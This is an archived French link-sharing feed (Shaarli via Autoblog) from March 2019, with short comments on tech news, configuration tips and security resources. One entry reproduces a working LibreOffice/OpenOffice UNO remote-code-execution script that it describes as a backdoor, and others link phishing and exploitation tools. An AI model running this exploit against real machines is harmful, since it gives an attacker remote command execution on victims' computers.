PROJET AUTOBLOG


shaarli-Links

Site original : shaarli-Links
⇐ retour index

Mise à jour

Mise à jour de la base de données, veuillez patienter...

La légende est fausse. - Liens en vrac de sebsauvage

lundi 25 mars 2019 à 10:05
En même temps, c'est des fonts de cales qui sont utilisés pour ce café. -_-
Permalink

Source : https://sebsauvage.net/links/?kYXK3Q


Dans le métro, ces écrans de publicités traquent vos smartphones - FrAndroid

dimanche 24 mars 2019 à 21:33
J'ai fais de la recherche à ce sujet pour un client publicitaire et voici compte compte rendu :
tracking wifi :
- possible avec des hotspots

tracking bluetooth :
- les nouvelles normes bluetooth impose une adresse MAC temporaire et aléatoire tant que l'appareil n'est pas appairé
- si appareil appairé, alors accès total au contenu du téléphone !

tracking NFC :
- nécessite une grande antenne

tracking GSM :
- IMSI-catcher : pas légale
- écoute passive du réseau : beaucoup de canaux
- accès à SS7 : €

Perso, je n'aime pas du tout bosser pour ce genre de client. C'est contre mes valeurs.
Heureusement, cela n'a pas abouti. (pour le moment)

Bref, retirer la batterie de votre téléphone ou mettez le dans une cage de faraday.
Au passage, le mode avion != de mode hors ligne.
mode avion == moins de communications et d'alertes coté utilisateur
https://sebsauvage.net/links/?OYairg
Permalink

Source : https://www.frandroid.com/culture-tech/577876_dans-le-metro-ces-ecrans-de-publicites-traquent-vos-smartphones


YouTube - Can Humans Sense Magnetic Fields?

dimanche 24 mars 2019 à 20:45
Intéressant
(Réponse: oui)
Permalink

Source : https://www.youtube.com/watch?v=dg3pza4y2ws


Le hacker geohot a peur que l'humanité ne soit qu'une simulation et veut l'en libérer - Le Hollandais Volant

dimanche 24 mars 2019 à 11:31
Il se lance dans le social engineering.
Permalink

Source : https://lehollandaisvolant.net/?id=20190324104713


Note : fréquence NTP - Le Hollandais Volant

vendredi 22 mars 2019 à 14:09
sudo nano /etc/ntp.conf
> server ntp.ubuntu.com iburst
# devient :
> server ntp.ubuntu.com iburst minpoll 12 maxpoll 17

sudo systemctl restart ntp
Permalink

Source : https://lehollandaisvolant.net/?id=20190322131205


GitHub - jondonas/linux-exploit-suggester-2: Next-Generation Linux Kernel Exploit Suggester

vendredi 22 mars 2019 à 11:20

Permalink

Source : https://github.com/jondonas/linux-exploit-suggester-2


Google goo.gl URL Shortener Closing March 30, 2019 - Liens en vrac de sebsauvage

jeudi 21 mars 2019 à 15:42
Bah oui, les raccourcisseurs d'URL, raccourcissent aussi leur vie.
Permalink

Source : https://sebsauvage.net/links/?bGnLWA


Buffer Overflow Practical Examples , ret2libc - protostar stack6 | 0xRick Owned Root !

jeudi 21 mars 2019 à 11:45

Permalink

Source : https://0xrick.github.io/binary-exploitation/bof6/


PHP: filter_var - Manual

mercredi 20 mars 2019 à 15:45
https://secure.php.net/manual/fr/function.filter-var.php
https://secure.php.net/manual/fr/function.filter-var-array.php
https://php.net/manual/fr/filter.filters.validate.php
https://secure.php.net/manual/fr/filter.filters.sanitize.php
https://secure.php.net/manual/fr/filter.filters.php

$var = filter_var('0755', FILTER_VALIDATE_INT, $options);
$var = filter_var('уникум@из.рф', FILTER_VALIDATE_EMAIL);
$var = filter_var('oops', FILTER_VALIDATE_BOOLEAN, FILTER_NULL_ON_FAILURE);

$data = [ "a" => 42, "b" => "tes%00t", "plop" => "yo"];
$args = [ "a" => FILTER_VALIDATE_INT, "b" => FILTER_SANITIZE_ENCODED];
var_dump(filter_var_array($data, $args));
Permalink

Source : https://secure.php.net/manual/fr/function.filter-var.php


Control Android Devices From Your Desktop With scrcpy (Ubuntu, Fedora, Debian, Linux Mint Installation) - Linux Uprising Blog

mardi 19 mars 2019 à 14:27
via https://sebsauvage.net/links/?21CrwQ
Permalink

Source : https://www.linuxuprising.com/2019/03/control-android-devices-from-your.html


Msfconsole Commands - Metasploit Unleashed

vendredi 15 mars 2019 à 16:15

Permalink

Source : https://www.offensive-security.com/metasploit-unleashed/msfconsole-commands/


Déploiement de la 5G : l'Allemagne victime collatérale du bras de fer opposant Huawei aux USA - Cyberguerre

vendredi 15 mars 2019 à 15:52
Alors, vous voulez la surveillance chinoise ou la surveillance américaine ?
Permalink

Source : https://cyberguerre.numerama.com/1087-deploiement-de-la-5g-lallemagne-victime-collaterale-du-bras-de-fer-opposant-huawei-aux-usa.html


Apache UNO / LibreOffice Version: 6.1.2 / OpenOffice 4.1.6 API - Remote Code Execution

vendredi 15 mars 2019 à 14:43
# Utilisation de LibreOffice comme backdoor.

# Sur le PC victime
# ouvrir un serveur d'écoute qui interprète les commandes qu'on lui envoit :
soffice --accept='socket,host=0.0.0.0,port=2002;urp;StarOffice.Service' --invisible

# Sur le PC de contrôle :
```
import uno
from com.sun.star.system import XSystemShellExecute
import argparse

parser = argparse.ArgumentParser()
parser.add_argument('--host', help='host to connect to', dest='host', required=True)
parser.add_argument('--port', help='port to connect to', dest='port', required=True)

args = parser.parse_args()
# Define the UNO component
localContext = uno.getComponentContext()

# Define the resolver to use, this is used to connect with the API
resolver = localContext.ServiceManager.createInstanceWithContext(
"com.sun.star.bridge.UnoUrlResolver", localContext )

# Connect with the provided host on the provided target port
print("[+] Connecting to target...")
context = resolver.resolve(
"uno:socket,host={0},port={1};urp;StarOffice.ComponentContext".format(args.host,args.port))
   
# Issue the service manager to spawn the SystemShellExecute module and execute calc.exe
service_manager = context.ServiceManager
print("[+] Connected to {0}".format(args.host))
shell_execute = service_manager.createInstance("com.sun.star.system.SystemShellExecute")
shell_execute.execute("firefox", 'http://exemple.com',1)
```
Permalink

Source : https://www.exploit-db.com/exploits/46544


Exploit Database - Exploits for Penetration Testers, Researchers, and Ethical Hackers

vendredi 15 mars 2019 à 11:02
https://www.exploit-db.com/searchsploit
# exemple :
searchsploit sftp
Permalink

Source : https://www.exploit-db.com


Category:Metasploitable - charlesreid1

vendredi 15 mars 2019 à 10:16

Permalink

Source : https://charlesreid1.com/wiki/Category:Metasploitable


DARPA Is Building a $10 Million, Open Source, Secure Voting System - Motherboard

vendredi 15 mars 2019 à 09:44
à suivre
Permalink

Source : https://motherboard.vice.com/en_us/article/yw84q7/darpa-is-building-a-dollar10-million-open-source-secure-voting-system


GitHub - rapid7/metasploitable3: Metasploitable3 is a VM that is built from the ground up with a large amount of security vulnerabilities.

jeudi 14 mars 2019 à 10:32

Permalink

Source : https://github.com/rapid7/metasploitable3


DEEP DARK & ACID TECHNO MIX 2018 | MAKE ACID GREAT AGAIN - YouTube

jeudi 14 mars 2019 à 09:56
via https://www.nothing-is-3d.com/links/?2uh_yw
Permalink

Source : https://www.youtube.com/watch?v=XUAAUALfTVA


GitHub - thelinuxchoice/blackeye: The most complete Phishing Tool, with 32 templates +1 customizable

jeudi 14 mars 2019 à 09:32
Quelqu'un a créé un outil de phishing qui copie 32 sites.
Permalink

Source : https://github.com/thelinuxchoice/blackeye


ArchiveBox – Un clone d’Archive.org à héberger vous-même – Korben

mercredi 13 mars 2019 à 17:17
https://github.com/pirate/ArchiveBox
https://github.com/pirate/ArchiveBox/wiki/Usage
https://archive.sweeting.me/
Permalink

Source : https://korben.info/archivebox-un-clone-darchive-org-et-de-la-wayback-machine-a-auto-heberger.html